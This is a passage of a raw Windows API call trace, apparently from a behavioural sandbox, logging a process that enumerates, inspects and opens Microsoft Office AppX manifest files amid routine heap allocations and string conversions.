hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.623] AreFileApisANSI () returned 1 [0098.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75be8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml") returned 105 [0098.623] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0018-0409-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x834d1316, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x834d1316, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83ecd099, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed)) returned 1 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0098.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.623] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e3474a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e3474a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3df10, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", cAlternateFileName="AP557F~1.XML")) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46128 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0098.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ca40 [0098.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46128 | out: hHeap=0x20000) returned 1 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35090 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35090 | out: hHeap=0x20000) returned 1 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34eb0 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34eb0 | out: hHeap=0x20000) returned 1 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88e18 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x89728 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88e18 | out: hHeap=0x20000) returned 1 [0098.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x89728 | out: hHeap=0x20000) returned 1 [0098.624] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.624] AreFileApisANSI () returned 1 [0098.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.624] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0098.625] AreFileApisANSI () returned 1 [0098.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 105 [0098.625] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.626] GetFileType (hFile=0x418) returned 0x1 [0098.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.626] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.626] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.626] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.626] CloseHandle (hObject=0x418) returned 1 [0098.627] AreFileApisANSI () returned 1 [0098.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 105 [0098.627] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.627] GetFileType (hFile=0x418) returned 0x1 [0098.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.627] CloseHandle (hObject=0x418) returned 1 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0098.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0098.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0098.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0098.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0098.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0098.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e458 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75c60 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75c60 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0098.628] AreFileApisANSI () returned 1 [0098.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml") returned 105 [0098.628] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0000-1000-0000000ff1ce.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x83e3474a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x83e3474a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x84214453, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3df10)) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.629] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x839bc0c9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x839bc0c9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x83e80c2c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ed, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", cAlternateFileName="APE193~1.XML")) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69170 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69170 | out: hHeap=0x20000) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8ca40 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8ca40 | out: hHeap=0x20000) returned 1 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x88c48 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0098.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xe0) returned 0x890d0 [0098.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88c48 | out: hHeap=0x20000) returned 1 [0098.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x890d0 | out: hHeap=0x20000) returned 1 [0098.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0098.630] AreFileApisANSI () returned 1 [0098.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml", lpUsedDefaultChar=0x0) returned 105 [0098.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0098.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.630] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0098.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0098.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0098.630] AreFileApisANSI () returned 1 [0098.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd2) returned 0x55f20 [0098.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x55f20, cchWideChar=105 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml") returned 105 [0098.630] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0019-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0098.631] GetFileType (hFile=0x418) returned 0x1 [0098.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x55f20 | out: hHeap=0x20000) returned 1 [0098.631] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0098.632] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0098.632] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0098.632] CloseHandle (hObject=0x418) returned 1 [0098.646] AreFileApisANSI () returned 1 [0098.646] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x76200, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0098.646] 